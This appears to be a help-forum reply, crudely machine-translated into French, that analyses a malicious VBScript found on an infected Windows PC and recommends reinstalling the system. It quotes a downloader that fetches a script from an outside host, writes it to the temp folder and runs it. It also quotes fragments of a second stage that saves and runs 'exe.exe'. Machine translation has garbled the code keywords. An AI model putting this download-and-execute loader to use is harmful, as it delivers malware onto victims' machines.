Voici je ne suis pas disposé à aller jusque ouvrir les sites Web que vous avez mentionnés cependant, des manuscrits ci-dessus ce que je vois…
Le manuscrit 1 crée un dossier blanc, des liens à un site Web et aux téléchargements le contenu de la page et des décharges il dans le dossier blanc. Ce dossier est sauvé en tant que « yb.vbs » et est censé s'exécuter.
-------------------------------------------------------------------
B= " yb.vbs "
Avec CreateObject (« MSXML2.XMLHTTP
»)
.open « OBTIENNENT », «
http://jyiop.com/kr/yb.vbs », faux
.send ()
Placer A = CreateObject (« Scripting.FileSystemObject
»)
Placer D = A.CreateTextFile (A.GetSpecialFolder
(
2) + « \ » + B)
D.WriteLine .responseText
Extrémité avec
D.Close
CreateObject (« WScript.Shell
»). Courir A.GetSpecialFolder (2) + » \ « + B
-------------------------------------------------------------------
Étape 2 maintenant que le dossier de vbs a été créé et course, il essaye de visiter une autre page Web mais cette fois sauve le contenu de page Web dans un dossier appelé le « exe.exe ». Ce nouveau dossier doit être sauvé dans la chemise de temp d'utilisateurs.
Le manuscrit court alors le dossier « exe.exe ».
Comme vous avez mentionné, le taskkill arrête Windows Media Player - pourquoi, qui sait ? ! ? !
Le manuscrit supprime alors le manuscrit de vb qu'étape 1 a créé (le manuscrit qui fonctionne actuellement).
Il y a une seconde attente 3 alors que le dossier « exe.exe » est supprimé.
La présente partie ;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z : c.send ()
Si c.Status = puis x
u=c.ResponseBody : d.Open : d.Type
= y : d.Write u : d.SaveToFile b : d.Close]
est le manuscrit dactylographiant pour ouvrir un dossier qui coulera dans la page Web - rien à faire avec Adobe. « c.Status » - le manuscrit attend la page Web pour être prêt et adapté à télécharger. « u=c.ResponseBody » prend la page Web et la pousse dans une variable. Le jet est ouvert et le texte est téléchargé dans la variable. Le dossier est sauvé et fermé. En ce manuscrit la page Web/dossier est sauvée dans la chemise de temp en tant que « exe.exe ».
Le vrai danger est que dossier de « exe.exe ». Une fois qu'il a été couru, nul ne peut dire ce qu'il a été conçu pour faire.
Cet ordinateur est encore atteint d'un virus. Le programme « exe.exe » pourrait avoir téléchargé d'autres virus à l'arrière-plan pour empêcher des balayages du système. Le fait que vous pouvez voir la fenêtre de commande ouverte et le manuscrit est essayé pour fonctionner me dit qu'il y a un certain dossier malveillant s'attardant toujours.
Il peut être temps d'évaluer quels besoins d'être sauvé à partir de cette machine et commencer à nouveau par une réinstallation de Windows et des applications. Il semble dramatique mais en voyant car l'antivirus ne détecte rien hors des sortes je penser que vous êtes au moment où aucun retour. Se en rappeler cela tant que le code malveillant est allumé là, conduisent ; que ce soit le bâton de mémoire d'USB, l'appareil-photo etc., peut potentiellement contenir le virus/Trojan, s'il était fixé à la machine.
